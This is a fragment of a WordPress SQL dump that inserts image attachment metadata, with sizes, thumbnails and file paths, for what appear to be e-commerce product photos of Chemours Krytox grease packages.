INSERT INTO `wp_postmeta` VALUES (1131, 371, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:27:"2016/08/20160812_104953.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"20160812_104953-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"20160812_104953-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"20160812_104953-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"20160812_104953-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"20160812_104953-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"20160812_104953-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"20160812_104953-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"20160812_104953-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1132, 372, '_wp_attached_file', '2016/08/20160812_105006.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1133, 367, '_wp_attachment_backup_sizes', 'a:8:{s:9:"full-orig";a:3:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:19:"20160812_104823.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:27:"20160812_104823-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:27:"20160812_104823-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:27:"20160812_104823-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:10:"large-orig";a:4:{s:4:"file";s:28:"20160812_104823-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:27:"20160812_104823-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:27:"20160812_104823-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:27:"20160812_104823-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (1134, 372, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:27:"2016/08/20160812_105006.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"20160812_105006-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"20160812_105006-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"20160812_105006-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"20160812_105006-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"20160812_105006-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"20160812_105006-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"20160812_105006-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"20160812_105006-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1135, 373, '_wp_attached_file', '2016/08/20160812_141944.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1136, 373, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:27:"2016/08/20160812_141944.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"20160812_141944-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"20160812_141944-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"20160812_141944-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"20160812_141944-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"20160812_141944-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"20160812_141944-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"20160812_141944-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"20160812_141944-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1137, 374, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-.5-oz-tube-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1138, 374, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:53:"2016/08/Chemours-Krytox-Grease-.5-oz-tube-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"Chemours-Krytox-Grease-.5-oz-tube-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1139, 375, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1140, 375, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:57:"2016/08/Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:57:"Chemours-Krytox-Grease-0.5-kg-Red-Top-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1141, 376, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1142, 376, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:59:"2016/08/Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:59:"Chemours-Krytox-Grease-0.8-kg-cartridge-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1143, 368, '_wp_attachment_backup_sizes', 'a:8:{s:9:"full-orig";a:3:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:19:"20160812_104844.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:27:"20160812_104844-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:27:"20160812_104844-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:27:"20160812_104844-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:10:"large-orig";a:4:{s:4:"file";s:28:"20160812_104844-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:27:"20160812_104844-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:27:"20160812_104844-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:27:"20160812_104844-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (1144, 377, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1145, 377, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:64:"2016/08/Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-0.8-kg-cartridge-Horz-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1146, 378, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-2-oz-tube-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1147, 378, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:52:"2016/08/Chemours-Krytox-Grease-2-oz-tube-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-2-oz-tube-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1148, 379, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1149, 379, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:54:"2016/08/Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:54:"Chemours-Krytox-Grease-5-7-Kg-Pail-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1150, 380, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-8-oz-tube-300-dpi.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1151, 380, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:52:"2016/08/Chemours-Krytox-Grease-8-oz-tube-300-dpi.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:52:"Chemours-Krytox-Grease-8-oz-tube-300-dpi-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1152, 369, '_wp_attachment_backup_sizes', 'a:8:{s:9:"full-orig";a:3:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:19:"20160812_104927.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:27:"20160812_104927-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:27:"20160812_104927-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:27:"20160812_104927-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:10:"large-orig";a:4:{s:4:"file";s:28:"20160812_104927-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:27:"20160812_104927-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:27:"20160812_104927-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:27:"20160812_104927-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (1153, 381, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-20-kg-44.1-lb-Pail-300-dpi.jpg'); 
